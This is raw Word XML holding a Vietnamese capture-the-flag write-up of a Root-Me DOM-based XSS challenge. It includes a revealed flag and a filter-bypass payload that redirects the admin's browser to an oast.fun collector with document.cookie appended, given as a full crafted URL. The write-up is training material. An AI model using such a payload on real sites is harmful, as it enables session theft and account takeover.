    <w:p w14:paraId="44AA7BD8" w14:textId="1538B2B1" w:rsidR="00E41D52" w:rsidRDefault="00E41D5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Nhìn chung bài này khá dễ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C0040" w14:textId="221269D3" w:rsidR="00E41D52" w:rsidRDefault="00E41D52">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37727D93" w14:textId="06E0B842" w:rsidR="00E41D52" w:rsidRDefault="00E41D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag=rootme{FilTERS_ByPass_DOm_BASEd_XSS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760960D7" w14:textId="77777777" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3036BA63" w14:textId="3E992688" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1467FC96" w14:textId="60D50008" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4563">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 3: XSS Dom Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F0A58" w14:textId="4CECD132" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34225557" w14:textId="62C984E4" w:rsidR="00FE4563" w:rsidRDefault="00FE456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toán cho phép tiêm script trên nickname và color.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBF9F0" w14:textId="48B06798" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32831247" w14:textId="16039E7F" w:rsidR="00FE4563" w:rsidRDefault="00FE456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Màu có thể chứa 3 kí tự và nickname khoảng 80 kí tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E42A4E" w14:textId="0337C6B6" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCED577" w14:textId="6A67E2BC" w:rsidR="00FE4563" w:rsidRDefault="00FE456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Chuỗi location và các kí tự như </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4563">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(,), ",`, ',;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị chặn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7225E8" w14:textId="6C25066D" w:rsidR="00FE4563" w:rsidRDefault="00FE4563">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637478EF" w14:textId="165961C6" w:rsidR="00FE4563" w:rsidRDefault="00CB67F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Dữ liệu chúng ta kiểm soát trong Dom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E08A219" w14:textId="2C3F89A0" w:rsidR="00CB67FF" w:rsidRDefault="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D1DAF8" w14:textId="77777777" w:rsidR="00CB67FF" w:rsidRDefault="00CB67F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this.data={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4B6E6" w14:textId="7853E216" w:rsidR="00CB67FF" w:rsidRDefault="00CB67F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Pr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"color": ""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0009CE8F" w14:textId="77777777" w:rsidR="00CB67FF" w:rsidRPr="00CB67FF" w:rsidRDefault="00CB67FF" w:rsidP="00CB67F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Pr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"callbacks": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345EF56" w14:textId="77777777" w:rsidR="00CB67FF" w:rsidRPr="00CB67FF" w:rsidRDefault="00CB67FF" w:rsidP="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "win": this.youwon,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB703C" w14:textId="77777777" w:rsidR="00CB67FF" w:rsidRPr="00CB67FF" w:rsidRDefault="00CB67FF" w:rsidP="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "lose": this.youlost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45155A78" w14:textId="2132C510" w:rsidR="00CB67FF" w:rsidRDefault="00CB67FF" w:rsidP="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          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67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BEB827" w14:textId="5D2CFF9A" w:rsidR="00CB67FF" w:rsidRDefault="00CB67FF" w:rsidP="00CB67F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Pr="00CB67FF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"seed": ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F925F" w14:textId="395456DF" w:rsidR="00CB67FF" w:rsidRDefault="00CB67F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739588B1" w14:textId="4AA9ECC8" w:rsidR="001E5D04" w:rsidRDefault="001E5D04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73ED7F82" w14:textId="21605EDE" w:rsidR="001E5D04" w:rsidRDefault="00B16993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Mở nhận xét ở </w:t>
      </w:r>
      <w:r w:rsidR="001E5D04" w:rsidRPr="001E5D04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trường thứ 1: </w:t>
      </w:r>
      <w:r w:rsidR="001E5D04">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E5D04" w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275891A9" w14:textId="0BD8C8B4" w:rsidR="001E5D04" w:rsidRDefault="001E5D04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08635398" w14:textId="77777777" w:rsidR="001E5D04" w:rsidRDefault="001E5D04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16985FBC" w14:textId="658A9D7F" w:rsidR="001E5D04" w:rsidRPr="001E5D04" w:rsidRDefault="001E5D04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E5D04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sử dụng trường thứ hai để chuyển hướng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC3761" w14:textId="6774C1C1" w:rsidR="00CB67FF" w:rsidRDefault="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CE60D8" w14:textId="4BD22A35" w:rsidR="001E5D04" w:rsidRDefault="001E5D0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Đóng  nhận xét:   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EAD70" w14:textId="57007EF9" w:rsidR="001E5D04" w:rsidRDefault="001E5D04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4913F5C4" w14:textId="5F6A00FC" w:rsidR="001E5D04" w:rsidRDefault="001E5D0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Đóng thuộc tính đang mở:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B49DB1" w14:textId="2C12301F" w:rsidR="00927DA4" w:rsidRDefault="00927DA4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3DC204" w14:textId="77777777" w:rsidR="00927DA4" w:rsidRPr="00B16993" w:rsidRDefault="00927DA4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B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>callbacks: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737A546" w14:textId="610CAAB1" w:rsidR="00927DA4" w:rsidRPr="00B16993" w:rsidRDefault="00927DA4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B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>win:this.youwon,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD2536" w14:textId="0AD3E75A" w:rsidR="00927DA4" w:rsidRDefault="00927DA4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>lose:{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D449A29" w14:textId="2A678FDC" w:rsidR="00927DA4" w:rsidRDefault="00927DA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// chuyển hướng bằng window.location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B11365" w14:textId="1E78E4D1" w:rsidR="00927DA4" w:rsidRDefault="00927DA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B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d: window[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEEF9D9" w14:textId="6B9E7473" w:rsidR="00927DA4" w:rsidRDefault="00927DA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// sử dụng RegEx để bỏ qua lọc chuỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E64B00" w14:textId="589A32FC" w:rsidR="00927DA4" w:rsidRDefault="00927DA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B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/loc/.source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34ECBB" w14:textId="04F0CA59" w:rsidR="00927DA4" w:rsidRDefault="00927DA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// sử dụng thực thể HTML để bỏ qua bộ lọc toán tử nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F7B9F" w14:textId="2E122021" w:rsidR="00927DA4" w:rsidRDefault="00927DA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B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%2B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08674D09" w14:textId="38A0FB80" w:rsidR="00927DA4" w:rsidRPr="00B16993" w:rsidRDefault="00927DA4" w:rsidP="00B16993">
      <w:pPr>
        <w:ind w:left="1440" w:right="-563"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ation/.source]=/http:\/\/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun/.source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F2A74" w14:textId="5BDB03FD" w:rsidR="00927DA4" w:rsidRPr="00B16993" w:rsidRDefault="00927DA4" w:rsidP="00927DA4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCDE2B" w14:textId="58AA12C9" w:rsidR="00927DA4" w:rsidRDefault="00927DA4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F9991" w14:textId="4FE7DEC5" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A18E4" w14:textId="547996D4" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9276EA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5CE8BD3B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"color"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6A9955"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B0728C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"callbacks": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77275732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"win": this.youwon,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B492069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"lose": this.youlost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D30BC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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF39F46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"seed": "*/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callbacks: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F320764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win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youwon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6BAE19B" w14:textId="732C0696" w:rsidR="00B16993" w:rsidRDefault="00B16993" w:rsidP="002127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lose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d:window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D16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/loc/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16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ation/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>]=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\/\/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ce6phne2vtc00004spq0g8dme4wyyyyyb.oas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D16969"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.fun/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cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6DB3D9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0D99830C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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55451676" w14:textId="77777777" w:rsidR="00B16993" w:rsidRDefault="00B16993" w:rsidP="00B169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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0A809" w14:textId="3C5B5110" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1641ACF4" w14:textId="567B820F" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B396771" w14:textId="44424CC4" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E87D890" w14:textId="77777777" w:rsidR="00B16993" w:rsidRDefault="00B16993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4694FE88" w14:textId="7694269D" w:rsidR="00B16993" w:rsidRDefault="00B1699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Cuối cùng, gửi url</w:t>
      </w:r>
      <w:r w:rsidR="00212704">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qua email cho quản trị viên bạn sẽ nhận được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A3E29" w14:textId="344F7EBE" w:rsidR="00212704" w:rsidRDefault="00212704">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B01CD25" w14:textId="77777777" w:rsidR="00212704" w:rsidRPr="00212704" w:rsidRDefault="00212704">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212704">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://challenge01.root-me.org/web-client/ch24/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDFC50" w14:textId="0EC4C082" w:rsidR="00212704" w:rsidRDefault="00212704">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212704">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?nickname=*/,callbacks:{win:this.youwon,lose:{d:window[/loc/.source%2b/ation/.source]=/http:\/\/ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun\//.source%2bdocument.cookie}}//&amp;color="/*&amp;p=game</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19E137" w14:textId="54E1D857" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
